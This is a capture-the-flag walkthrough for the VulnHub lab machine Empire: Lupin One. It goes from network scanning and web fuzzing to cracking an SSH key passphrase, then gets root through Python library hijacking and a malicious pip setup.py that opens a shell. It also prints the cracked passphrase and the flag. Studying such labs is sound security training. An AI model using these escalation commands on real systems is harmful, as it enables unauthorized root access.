Setup Vulhub Machine: –
- First, we have to download the zip file from VulnHub. (https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip)
- Extract the .zip file
- Open Virtual Box, and then click on new. Fill in the name, type, and version
- Click Next and customize the memory size and then browse the existing virtual disk file
- After completion, Check if the Network Adapter is set to Host-only adapter, or not.
- Once you are done with the settings up, let’s start the instance VMs.
- Now, the instance is ready and we have got a terminal screen that prompts us to input the password.
The Walkthrough: –
The Walkthrough: –
Step 1:- (Enumeration)
find out the target IP address using NetDiscover.
┌─(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0
From the Scanning result, we have discovered our target IP address i.e., 192.168.56.103. We have discovered the IP address, so let’s perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:
- -sC: perform a script scan using the default set of scripts,
- -sV: enables version detection, which will detect what versions are running on what port.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.56.103
[sudo] password for rootharsh:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 17:28 IST
Nmap scan report for 192.168.56.103
Host is up (0.012s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 edead9d3af199c8e4e0f31dbf25d1279 (RSA)
| 256 bf9fa993c58721a36b6f9ee68761f519 (ECDSA)
|_ 256 ac18eccc35c051f56f4774c30195b40f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.71 secondsFrom the Nmap output, we have spotted two open ports.
- Port 22/TCP running an SSH service, which means, that if we have a valid username, and password then will be easily accessed the server.
- Port 80/TCP runs an HTTP service, which indicates that there might be a website running.
If you look at the below script, you will find out, that there is a robots.txt file disallowing a directory called /~my files on the webserver.
Let’s look at the contents, we can open a web browser and navigate to the target’s IP address in the URL bar at the top of the window.
If you look at the robots.txt file, you can spot a file that disallowing from being crawling.
Let’s visit this file.
Now we began the enumeration procedure by inspecting the (/~myfiles) HTTP page. From the output, we have discovered an Error 404, which seemed suspicious.
Note:-
In the older version of the Apache server, the “~” tilde symbol was used to refer to the home directory of a user.
However, this is not the case for newer versions. So, we can try to find out similar paths to start with the same symbol (~). Let’s look at the page source code to find a clue to foothold the instance.
(If there is nothing else special from the page source, so move to further steps.)
Step 2:- (Foothold)
Now we are going to find out the hidden directories, and files on the webserver that can also be categorized under fuzzing. The tool we are going to use is FFUF (A fast web fuzzer). FFUF does not come pre-installed with Kali Linux, so we have to install them separately. Install and Learn More: https://github.com/ffuf/ffuf
Let’s perform Fuzzing to find out hidden files and directories.
- -c: colorize the output,
- -u: set the Target URL,
- -w: set the Wordlist file path.
┌──(rootharsh㉿kali)-[~/Downloads/tools/ffuf]
┌──(rootharsh㉿kali)-[~/Downloads/tools/ffuf]
└─$ ffuf -c -u http://192.168.56.103//~FUZZ -w /usr/share/wordlists/dirb/common.txt
/'_\ /'_\ /'_\
/\ \_/ /\ \/ _ _ /\ \_/
\ \ ,_\\ \ ,\/\ \/\ \ \ \ ,_\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \__/ \ \_\
\// \// \/_/ \/_/
v2.0.0-dev
________________
:: Method : GET
:: URL : http://192.168.56.103//~FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________
[Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 8ms]
* FUZZ: secret
:: Progress: [4614/4614] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: The scan results identified ‘secret’ as a valid directory name from the server. So let us open this directory in the browser.
The page contained three major hints for the machine.
- 1) The First hint is that there is a hidden file for the SSH private key.
- 2) Secondly, we have a wordlist that will help us to crack the SSH hashes.
- 3) In the end, the hint also talks about the best friend, this is possibly a username.
So, our first task is to find out the hidden file which contains the SSH key. To find the secret private SSH key, we again use fuzzing with the help of FFUF once more. Where we are going to use three new parameters.
- -ic: ignore wordlist comments.
- -fc: filter HTTP status codes from the response.
- -e: specify the list of extensions.
┌──(rootharsh㉿kali)-[~/Downloads/tools/ffuf]
└─$ ffuf -c -ic -u http://192.168.56.103/~secret/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 403 -e .txt,.html
/'_\ /'_\ /'_\
/\ \_/ /\ \/ _ _ /\ \_/
\ \ ,_\\ \ ,\/\ \/\ \ \ \ ,_\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \__/ \ \_\
\// \// \/_/ \/_/
v2.0.0-dev
________________
:: Method : GET
:: URL : http://192.168.56.103/~secret/.FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Extensions : .txt .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 3ms]
* FUZZ:
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 27ms]
* FUZZ:
[Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 6ms]
* FUZZ: mysecret.txt
:: Progress: [262953/262953] :: Job [1/1] :: 4166 req/sec :: Duration: [0:01:05] :: Errors: 0 ::After completing the scan, we identified one file that returned 200 responses from the server. So, let’s open that file on the browser.
When we opened the file on the browser, it will redirect us to a new page that might contain some encoded message. We need to figure out the encryption type to decrypt the actual SSH key.
Visit Cyberchef. Learn More:– (https://github.com/gchq/CyberChef)
Paste the string in the input section and Drag and Drop each operation to recipe to match the encryption Type. After analyzing I find out that the string is encrypted with base 58.
The string was successfully decoded without any errors. We have identified an SSH private key, that can be used for SSH login on the target machine.
Save the key into the file using the nano text editor.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nano ssh_key.rsa
[sudo] password for rootharsh:
Since the author has shared some hints related to the passphrase for SSH Key, thus we are going to use SSH2john to obtain the hash value of the SSH key.
─(rootharsh㉿kali)-[~]
└─$ locate ssh2john
/usr/bin/ssh2john
/usr/share/john/ssh2john.py
/usr/share/john/_pycache_/ssh2john.cpython-310.pyc
┌──(rootharsh㉿kali)-[~]
└─$ /usr/share/john/ssh2john.py ssh_key.rsa > ssh_hash
┌──(rootharsh㉿kali)-[~]
└─$ cat ssh_hash
ssh_key.rsa:$sshng$2$16$f2df77361693c16003677b8a33deeb06$2486$6f70656e7373682d6b65792d7631000000000a6165733235362d636263000000066263727970740000001800000010f2df77361693c16003677b8a33deeb06000000100000000100000217000000077373682d727361000000030100010000020100c1cc78f325cbe4f465e2cada65813f73fe63fdd4da8e53d428030a29e493718447e6fe3e4a426763fc907bb10d61068b4e36fa9a01d9ac2be3982fd1fa3526f48cc6cc738b2816b0629e82c4931f3de01fcfa944ce0deb0c115fda2b6d9429e81dc2527d02b7fed58e3c57cea09334bac73a0a9ff131564029b1d8a6211bc686cbf864c98c6449132284c41b3eeb683ed01c31178aeb16974864877deb4190ab16c6454fb274c0a80bad7da99a83100baa38d8e40968d2c1cd3c4263a8d4d810d0102a15b913cbede25ad3f9d17c268eac8ccf7d9fcd35882efc395fd4299b5c4b02566943ef571b3eac1f58a19fde159e12bd16750844b937f93b20c80b051b83474b88acf891cb2461c0f31f4667683b268e862fdae2d52e2d7d8eb7e7a7fb55a0b6ca9b7f489a657a26e6e3e899a91d77b07b02a2bfacf59cd13c9a41cca58e4885ed1c2ddcafdf5e9b148f0efb7cb99b780f22151493bf02e67d1550e3d240cb31e7a77e07d1f66c5888da5a35f264c56b06b4a5f5dd701557664a2e5f79e5641d7f5e88a9ef52c7de43c8ed4edf3eccf91321483d621a10db119b39dbb58f5a8d085b8c70231429408735c98b82c667a9a368612297ef60e14ee98ed100a98bf5fb7c7c17ecee899b1574caffeba31ae1eea2c0f2ea9adceddd488519be087b5c5a5907fb527968294ca32ef33005b6f781161a9016d0029a0e3611a8610000075064b8515cb4008dae50f1375f34bdccea9975ecfa87dd1520e27a23612822dd4aa143b1200b69790b5fc0c50e9158db7eaa404d69a02f8b26c3c72584a964eaf47068ed5a932431c067cc3f6eca70a3859f628da3d8fef318ee6b4764d098f127a8580c585d3a0acb672effea55c8643be8a62ddc9d004fbc00d8e47768c324d28d4ba28ceecaf3ab07771730787be7305f810c8079e0fb2f2606fdbef3eb31af57165c6bf839ef6097c5749795b40ec3f011f00ae100fe1225136416857661109edfc5a1404a7847a93edf8b4afa452811a5406f053e21c858c8cf196ab4af1d5a44bc550f8803521c267f6fea5d290b41cd3939fd51ff264dd03dc1faf44272c7cfe0444fe095063acfa9c2eaea06e0090897e80ec59d2158926fd11d5282b73dd66055718c26b943c5441e5814c1c359b62667422f719b54c51b12936fee583599716e2d0ec90454f7edaea137e9fb66f5e27f9d60ec66837165b8e8e1c178e0f4c5d1653a53452c256ea60dc943928e974a308ae2d93cbebe2a401f0e2c140c6db08e11538e3a6f6bbbcf5ed5af8508a8443cfe8b7f0a0118264c92a74ea9499ab2dbc27949a1b7a6b5cfa9d74e2ce89a6672c7e96d83d73dc5f78ef2d835c5ab027a5d4196e22150ac060e42c278812c0f51d80c15dbf878e61dfc33462a67fed2ee34f2cd8c69f1f4ba5577b33bd858e4ea5972f0a5062fbcfde4702dc264a0a8846537e33988a941e4255a7ead33e7d541f2f6fda0c5069020b955045f2a5cef2a73e4d007bd4323d4cc00f2fa00ae4361e64a4253c4ce8ac68654a4309fbe7d3c4f1b74767ec29d3ac53c621c4ce70d8b6c731aedf00bb8e966f92771937ea91074b9c77abdf274e26713d37539a2afbebb25f1f2de8428449ae0b5dc70f18d8697e19c4720be2e9004c0604353e1d094a7501ee38eb923a82d6af2a44db847161f21e0b5cef9270128e5178b755fe164158f0fc65e7e6f14cad14349a804078d048fd8db0f91a81cc3c1c7c54938b850fb8ff1b9a6a2ac2eecf4e717e160d9797dc4d058cff64ab7404607cdc8b1cd70a99392a7566c4fba5eef362790da0a818ed47d040dcfa825cf7881f43965d813e2d19c6df95ba99eaaa401c3c8123f09f8f589585b7c31bf51b7ab1a9a6a81b6dc74f777129cb2ca7e5ea99200b689233625a671f90a66a8e1e050e23bfbab129186ca6501b6cbdbbe34797b6b864dc021689ac358740d15eb9b61a4bdbbc011ec31dec5c4b4f9cc1b8615c950057e0237ecc503adc2cef77a156f8a7fac71eaa8f34c3703359ecf9a745ed1123cc5c2be3fb6b66ad17164ae909ee5f0581f9f18c9f3bf83cba9dc3331712488eb746a49b93ad19de2622c01f22420a2bb599b452c41bccb8fd8b5ca2290e8e7a44506841b1ba22140354af66840ef4d9d3a34495cbb987cf31b5ee72b894c257a93c65d3cab6e8ecef76a7af317f5bdc600155a1fb7ec631a1717b783b114b1f37a63adc49dfadd3eb7f618850febdb3df461fab02dab3b96da09a2d4dc98fa88236f09a57fe796990431cb97a0b0f32ef099391a3b01877c250aed836032b3ca471b29f29453034e7d7780f25360984b0cee07f7eedd672f36e6691f2a76213e78a8294160a892b6cacc106913cb6a41d4caf88d5eab71caa29ce6a610326945d4cf9f4a31311187d76c8701859ee05d8c1a9465fbb97f2f93cccee5d87d5bd49b3b82f1948f274af7b31892560465d90194a22e4095a74f0f78ac6628dd92d53cf1aa85bb54e9c8de306f283dc8a505d2b1b4e0cf9581d3b0549946f1097975358cd71cf1003fde4893c70c07c30ec857049530fc057251057d88eb31ce87ee106b8fa8564f5996e2c1c5ebb6dab5601bb9794c77233bb2f862e6e25ee1363fbbbbee86d651f7a5b42f304348c0ad68b6eb1fc852dfc53fc36af7ae290fb9bf74f1d013cfe8878575353196ac3b0adc06cb93f32b81139283b21ce014bff08c1156e0be776c353eaf97fb33246e51290f8f48bae21acc9047937b3a4b25948497c3eaee02dcdf330b725e6e5ea2c5e54cdaf109599d9585ccbedf5a8ff343bff8a93d35459a96ccfee8ab76cae7815cdd4b2c524d45532f54ef36debcd554e636c97c3c01564a3aa0d1ce0bc19350079d2eebde57c758487947236188420a67ec034ae38a7a7a9cef519fbe0995394ca9613b68239dbb7e217ff6b4b73101f667797ea96330e40d4f53604290cb28d3ad0e204f4fe4a7c5ddab716e20158a2ea829f067461a8cdace12a560d977cc4f69f92d04f32037ded3ccb58cea98b43604be7c9b493e90d12fcbd31af1421c7562e1281307ae3e1d3007e77b900b9aa2ce3e6ddfc8a7dcb096b4f131195dde88a6f1b8cc6d0c6c3048b4ff0ca71941be74b10b095312a4b8cc9fbc3402f70ca16271f4ff89bd6a181a4f0cd015fc9fec36d3334fac5caae54d874c6063598ad29ea81d5bb14d87a43821dc7bae74855bb571bbe2765a2cf4debd2ad929200e8adf90cfa336640b89279b3b50496aacb96247614037e8011029b646acc1dc7ba3f26337f518ad446b4885e8e9b16ac391b4b35473214c4cf8b48c0780a934d414c3df8af279e97fe0e465b0289427ae9699150df44a15964782cd02708af2$16$614Now, run john the ripper to crack the hash value.
┌──(rootharsh㉿kali)-[~]
└─$ john --wordlist=/usr/share/set/src/fasttrack/wordlist.txt ssh_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd! (ssh_key.rsa)
1g 0:00:00:02 DONE (2023-03-10 15:59) 0.3484g/s 16.72p/s 16.72c/s 16.72C/s Spring2017..Welcome1212
Use the "--show" option to display all of the cracked passwords reliably
Session completed.From the output, we obtained a password. Now we have a username, and password, let’s perform a secure shell connection to enable secure remote connections using the usernames and the relevant passwords.
┌──(rootharsh㉿kali)-[~]
└─$ ssh -i ssh_key.rsa icex64@192.168.56.103
Enter passphrase for key 'ssh_key.rsa': P@55w0rd!
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Thu Oct 7 05:41:43 2021 from 192.168.26.4We successfully authenticated and got a secure shell. As it’s depicted now, we have accessed the user Icex64. Next, run the ls command to list the files and the directories contents. As a result, we found the user.txt.
Since running shell is not have root permission, So, let’s identify further information about the target machine, which could be useful for gaining root access.
Step 3:- (Privilege Escalation)
Let’s identify the rights, and privileges of the current user by executing the sudo -l command.
icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$After analyzing the output, we confirm that the running python script may be vulnerable to the Python Library Hijacking approach. You find out more about this vulnerability by searching on google. Let’s take a look at the contents of the python script.
icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser
print (“Its not yet ready to get in action”)
webbrowser.open(“https://empirecybersecurity.co.mz”)
icex64@LupinOne:~$After analyzing the script we found a piece of important information.
Note:- If we execute this python script, it will call the web browser library and display the URL on the browser interface. What if we inject the bash shell script, and again execute the program to escalate the privilege.
So, we have to find out the location of the library using locate command.
icex64@LupinOne:~$ locate webbrowser
/usr/lib/python3.9/_pycache_/webbrowser.cpython-39.pyc
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$From the output, we have obtained the location of the Python library of “webbrowser.py”. We will now begin our Python Library Hijacking procedure. You will list the detail of the library if we have to change the read, and write permission.
icex64@LupinOne:~$ ls -al /usr/lib/python3.9/webbrowser.py
-rwxrwxrwx 1 root root 24110 Feb 10 08:54 /usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$Now open the python script using nano command to edit the script.
icex64@LupinOne:~$ nano /usr/lib/python3.9/webbrowser.pyNow add below script to call root shell.
os.system(“/bin/bash”)Let’s execute the python script to switch the user to Arsene.
icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/home/icex64$We are switched to the user arsene, but we don’t have root privilege, so let’s again identify the rights, and privileges of the current user Arsene.
arsene@LupinOne:/home/icex64$ sudo -l
Matching Defaults entries for arsene on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User arsene may run the following commands on LupinOne:
(root) NOPASSWD: /usr/bin/pip
arsene@LupinOne:/home/icex64$After analyzing the output, we spotted a new vulnerability that will help us to escalate the privilege. This is known as PIP Privilege Escalation. You will find out detailed information by searching on Google.
Copy each of them, and paste them to the terminal one by one to get the root shell.
arsene@LupinOne:/home/icex64$ TF=$(mktemp -d)
arsene@LupinOne:/home/icex64$ echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/setup.py
arsene@LupinOne:/home/icex64$ sudo pip install $TF
Processing /tmp/tmp.UqEhvH8ffJ
# whoami
root
#Finally, we have the root shell and verify using the whoami command. It has been proven that it is the root, simply change the directory to the /root path to obtain the root flag.
# cd /root
# ls
root.txt
# cat root.txt
*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(((((((((((((((((((((,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
, .&&&&&&&&&( /&&&&&&&&&
, &&&&&&* @&&&&&&
, *&&&&& &&&&&&
, &&&&& &&&&&.
, &&&& ./#%@@&#, &&&&*
, &%&& &&&&&&&&&&&*,*/&&(&&&&&&&& &&&&
, &@(& &&&&&&&&&&&&&&&…..,&&*&&&&&&&&&& &&&&
, .& & &&&&&&&&&&&&&&& &&.&&&&&&&&&& &%&
, @& & &&&&&&&&&&&&&&& && &&&&&&&&&& @&&&
, &%(( &&&&&&&&&&&&&&& && &&&&&&&&&& #&&&
, &#/* &&&&&&&&&&&&&&& && #&&&&&&&&&( (&&&
, %@ & &&&&&&&&&&&&&&& && ,&&&&&&&&&& /*&/
, & & &&&&&&&&&&&&&&& &&* &&&&&&&&&& & &
, & & &&&&&&&&&&&&&&&, &&& &&&&&&&&&&( &,@
,.& # #&&&&&&&&&&&&&&( &&&.&&&&&&&&&&& & &
*& & ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &(&
*& & ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& & &
*& * &&&&&&&&&&&&&&&&&&&@. &&&&&&&& @ &
*& &&&&&&&&&&&&&&&&&&@ &&&&&/ &&&&&& & &
*% . &&&&&&&&&&&@&&&&&&& & &&( #&&&& &&&&. % &
& * &&&&&&&&&& / @%&%&&&&&&&& &&&&, @ &
*& & &&&&&&& & &&&&&&&&&& @&&& & &
*& & &&&&& / /&&&& &&& & @
*/(, && & / &.
* & & &&& # &&&&&& @ & &.
* .% & &&&%& & @&&&&&&&&&. %@&&* ( @,
/ & % .&&&& &@ @ &/ @ &
* & @ &&&&&& &&. , & &
* & & &&&&&&&&&& & &&&( & & &
, & % &&&&&&&&&&&&&&&( .&&&&&&& & & &
, & .. &&&&&&&&&&&&&&&&&&&&&&&&&&&&* & & & &
, #& & &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &. % &
, & , &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&. &&&& @ &*
, & ,, &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&. /&&&&&&&& & &@
, & & #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&@ &. &&
, && /# /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&# &&&# &# #&
, && &( .&&&&&&&&&&&&&&&&&&&&&&&&&&& && &&
/ ,&&( &&% *&&&&&&&&&&% .&&& /&&,
, &&&&&/… .#&&&&#
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
See you on the next heist.
#Congratulation! On completion of the CTFchallenge.